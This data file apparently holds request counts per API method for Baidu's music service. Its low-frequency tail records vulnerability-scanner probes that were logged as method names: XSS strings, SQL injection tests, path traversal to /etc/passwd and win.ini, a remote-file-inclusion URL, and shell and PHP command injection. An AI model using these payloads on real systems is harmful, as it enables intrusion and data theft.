baidu.ting.song.getInfos	64434299
baidu.ting.song.baseInfo	26567184
baidu.ting.search.catalogSug	24912796
baidu.ting.search.lrcpic	24841738
baidu.ting.user.listenAge	18166338
baidu.ting.song.play	14792181
baidu.ting.search.common	12852070
baidu.ting.song.down	9256099
baidu.ting.song.lry	7116880
baidu.ting.user.getUserBaseInfo	6600583
baidu.ting.artist.getSongList	5415741
baidu.ting.song.getInfo	5090289
baidu.ting.search.lrcys	5035116
baidu.ting.user.checkSuggestVersion	5019073
baidu.ting.artist.getList	4849189
ting.baidu.diy.getPlaylists	4806066
baidu.ting.search.getPhotoInfos	4766607
baidu.ting.billboard.billList	4421794
baidu.ting.game.gamedetail	3382049
baidu.ting.favorite.isCollect	3157141
baidu.ting.diy.gedanInfo	3045252
baidu.ting.plaza.getRecommendAlbum	3042730
baidu.ting.user.checkComVersion	2962205
baidu.ting.artist.getInfo	2762921
baidu.ting.plaza.active	2687940
baidu.ting.user.config	2661647
baidu.ting.radio.playAction	2585304
baidu.ting.active.start	2491308
baidu.ting.song.playAAC	2367397
baidu.ting.plaza.getFocusPic	1955364
baidu.ting.diy.gedanHot	1643160
baidu.ting.search.suggestion	1417550
baidu.ting.artist.getinfo	1371537
baidu.ting.radio.getChannelSong	1352091
baidu.ting.album.getAlbumInfo	1319916
baidu.ting.favorite.getCollectSong	1281822
baidu.ting.diy.category	1263287
ting.baidu.plaza.recdaily	1248238
baidu.ting.diy.getSongFromOfficalList	1218317
baidu.ting.diy.addListenCount	1094425
baidu.ting.plaza.recdaily	1013938
baidu.ting.diy.getNowOfficalList	976924
baidu.ting.plaza.getPartDesc	937315
baidu.ting.artist.getAlbumList	844461
baidu.ting.song.audio	759604
baidu.ting.user.RegistToImsg	703557
baidu.ting.tag.songlist	697222
baidu.ting.diy.gedan	689869
baidu.ting.tag.getHotTag	653346
	595159
baidu.ting.user.down	583002
baidu.ting.feedback.song	513410
baidu.ting.radio.getCategoryList	439405
baidu.ting.search.lrcyss	416842
baidu.ting.search.getPhotoInfo	373855
baidu.ting.billboard.billCategory	360983
baidu.ting.user.registToUC	359595
baidu.ting.artist.get72HotArtist	285848
baidu.ting.diy.getPlaylists	280897
baidu.ting.favorite.getFavoriteSong	197193
baidu.ting.plaza.recommend	184350
baidu.ting.game.gamelist	178619
baidu.ting.song.buffer	168903
baidu.ting.user.getMessage	160068
baidu.ting.video.getList	154771
baidu.ting.song.getMulInfos	135152
baidu.ting.favorite.addSongFavorites	129476
baidu.ting.diy.search	109573
baidu.ting.tag.getAllTag	109512
baidu.ting.diy.getSimilarGedan	96850
baidu.ting.diy.getOfficialDiyList	87476
baidu.ting.video.play	76586
baidu.ting.favorite.addSongFavorite	74693
baidu.ting.user.checkVersion	59414
baidu.ting.artist.getSpecialSongList	47451
baidu.ting.plaza.getNewSongs	45706
baidu.ting.favorite.delCollectSong	42746
baidu.ting.artist.getInfoList	41176
ting.baidu.diy.getPlaylist	32462
baidu.ting.radio.getArtistChannelSong	28066
baidu.ting.radio.getFavoriteSong	23070
baidu.ting.radio.serv	18997
baidu.ting.plaza.getArtistPlaza	18440
baidu.ting.diy.getPlaylist	17974
baidu.ting.artist.getHighSongTitle	14328
baidu.ting.feedback.crash	13629
baidu.ting.diy.saveList	11650
baidu.ting.album.getList	11516
ting.baidu.film.getFilmInfo	11005
baidu.ting.user.nplogin	10757
baidu.ting.song.cloud	9219
baidu.ting.mv.getIndexMV	8021
baidu.ting.song.getMulInfo	7821
baidu.ting.favorite.delSongFavorite	7764
baidu.ting.artist.getQianQianArtist	7419
ting.baidu.song.lry	6813
baidu.ting.weixin.response	5242
baidu.ting.diy.delListSong	4920
baidu.ting.diy.addListSong	4824
baidu.ting.user.logout	4695
baidu.ting.mv.playMV	4477
baidu.ting.video.category	4268
baidu.ting.diy.delList	4130
baidu.ting.billboard.catalog	4023
baidu.ting.user.regPassport	3818
baidu.ting.colorRing.listen	3742
baidu.ting.artist.getHighSongList	3724
baidu.ting.user.getMobileVcode	2618
ting.baidu.artistapp.renum	2602
baidu.ting.colorRing.getCode	2288
baidu.ting.favorite.delSongFavorites	2200
baidu.ting.colorRing.authset	2010
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.feedback.info	1466
baidu.ting.favorite.getFavoriteAlbum	1379
baidu.ting.artist.getSongRank	1332
baidu.ting.artist.getSong	1325
baidu.ting.mv.searchMV	1270
baidu.ting.diy.upList	995
baidu.ting.artist.getSongVote	890
baidu.ting.favorite.getListenHistory	886
ting.baidu.artistapp.brief	751
baidu.ting.diy.addList	704
baidu.ting.video.recMv	578
baidu.ting.user.activate	563
ting.baidu.search.lrcpic	524
baidu.ting.favorite.getOffenListenList	486
baidu.ting.artist.getInfoByName	300
baidu.ting.song.getSuoSongInfo	296
baidu.ting.colorRing.subscribe	269
baidu.ting.artistapp.photo	235
baidu.ting.mv.getMultiSongMVInfo	217
baidu.ting.colorRing.toneset	208
baidu.ting.favorite.getInfoFromView	193
baidu.ting.song.getHash	189
baidu.ting.user.login	182
baidu.ting.favorite.addAlbumFavorite	172
baidu.ting.favorite.delAlbumFavorite	153
ting.baidu.artistapp.newList	135
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	134
baidu.ting.plaza.getMisNewSong	120
ting.baidu.artistapp.news	118
baidu.ting.mv.getMVCategory	97
ting.baidu.artistapp.briefs	72
ting.baidu.video.getlist	66
ting.baidu.billboard.billcategory	52
ting.baidu.search.common	51
baidu.ting.user.addPassportInfo	44
ting.baidu.album.getList	37
baidu.ting.game.catalog	30
\' (	28
baidu.ting.album.getAlbumstyle	25
(	25
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	18
ting.baidu.diy.gedanhot	17
ting.baidu.artistapp.send	14
baidu.ting.song.play\';alert(1);\'	12
ting.baidu.user.getUserBaseInfo	12
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	12
http://cirt.lnet/rfiinc.txt	10
../../../../../../../../../../etc/passwd_	10
c:/windows/win.ini_	10
file:///etc/passwd_	10
baidu.ting.outerPassport.profile	10
string:{var_dump(md5(812812))}	10
../../../../../../../../../../etc/rc.d/rc.local_	9
\'];${@print(md5(812812))};//	9
../../../../../../../../../../etc/rc.d/rc.local	9
http://cirt.lnet/rfiinc.txt_	8
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	8
set	8
file:///etc/rc.d/rc.local_	8
/usr/bin/id;	8
file:///etc/passwd	8
baidu.ting.song.lry\';alert(1);\'	8
1\\\";cat /etc/rc.d/rc.local;\\\"	8
../../../../../../../../../../etc/passwd	8
baidu.ting.game.gameplay	7
${@print(md5(812812))}	7
c:/windows/win.ini	7
%{	7
${	7
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	7
baidu.ting.song.play</script><script>alert(1);//	6
baidu.ting.song.play<script>confirm(1)</script>	6
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	6
baidu.ting.song.play\') and 8288=8288 and (\'	6
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	6
baidu.ting.song.play\' and \'8281\'=\'8281	6
baidu.ting.song.play\'\";alert(1);//	6
baidu.ting.song.playjavascript:alert(1)	6
ting.baidu.game.gamedetail	6
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	6
baidu.ting.song.play\";alert(1);\"	6
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	6
baidu.ting.song.play;alert(1);//	6
ting.baidu.mv.getArtistMVInfo	6
ting.baidu.album.getAlbumInfo	6
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	6
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	6
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	6
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	6
baidu.ting.song.play</textarea></title><script>alert(1)</script>	6
baidu.ting.song.play--></script><script>alert(1)</script>	6
baidu.ting.song.play>\'>\"><script>alert(1)</script>	6
1\';cat /etc/rc.d/rc.local;\'	6
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	6
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	6
file:///etc/rc.d/rc.local	5
1;cat /etc/rc.d/rc.local;	5
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	4
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.song.lry</script><script>alert(1);//	4
baidu.ting.song.lry<script>confirm(1)</script>	4
baidu.ting.song.lry\') and 8288=8288 and (\'	4
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	4
baidu.ting.song.lry\' and \'8281\'=\'8281	4
baidu.ting.song.lryjavascript:alert(1)	4
baidu.ting.song.lry\'\";alert(1);//	4
baidu.ting.song.lry\";alert(1);\"	4
ting.baidu.radio.getFavoriteSong	4
baidu.ting.song.lry;alert(1);//	4
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	4
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	4
baidu.ting.song.lry--></script><script>alert(1)</script>	4
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
ting.baidu.search.playback	3
ting.baidu.plaza.active	3
ting.baidu.plaza.recommend	3
ting.baidu.game.catalog	3
file:///etc/passwd_.jpg	3
ting.baidu.diy.search	3
ting.baidu.song.audio	3
ting.baidu.mv.getMultiSongMVInfo	3
ting.baidu.feedback.crash	3
file:///etc/rc.d/rc.local_.jpeg	3
c:/windows/win.ini_.htm	3
file:///etc/rc.d/rc.local_.htm	3
ting.baidu.mv.getindexmv	3
ting.baidu.diy.gedan	3
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	3
ting.baidu.mv.playmv	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	3
../../../../../../../../../../etc/passwd_.php	2
../../../../../../../../../../etc/passwd_.jpg	2
ting.baidu.user.checkSuggestVersion	2
file:///etc/passwd_.php	2
c:/windows/win.ini_.php	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1385058463.22	2
http://10.42.7.217/?1385052702.45	2
http://10.42.7.217/?1385052107.66	2
http://10.42.7.217/?1385046229.76	2
http://10.42.7.217/?1385031384.92	2
file:///etc/passwd_.htm	2
c:/windows/win.ini_.jpg	2
http://cirt.lnet/rfiinc.txt_.htm	2
c:/windows/win.ini_.jpeg	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	2
ting.baidu.plaza.getFocusPic	2
../../../../../../../../../../etc/passwd_.jpeg	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
http://10.42.7.217/?1385039064.52	1
http://cirt.lnet/rfiinc.txt_.php	1
http://cirt.lnet/rfiinc.txt_.jpg	1
http://10.42.7.217/?1385038807.3	1
http://10.42.7.217/?1385026863.4	1
file:///etc/rc.d/rc.local_.html	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.jpg	1
baidu.ting.plaza.getRecommend	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
../../../../../../../../../../etc/rc.d/rc.local_.htm	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	1
file:///etc/passwd_.jpeg	1
baidu.ting.song.getIndos	1
baidu.ting.push.send	1
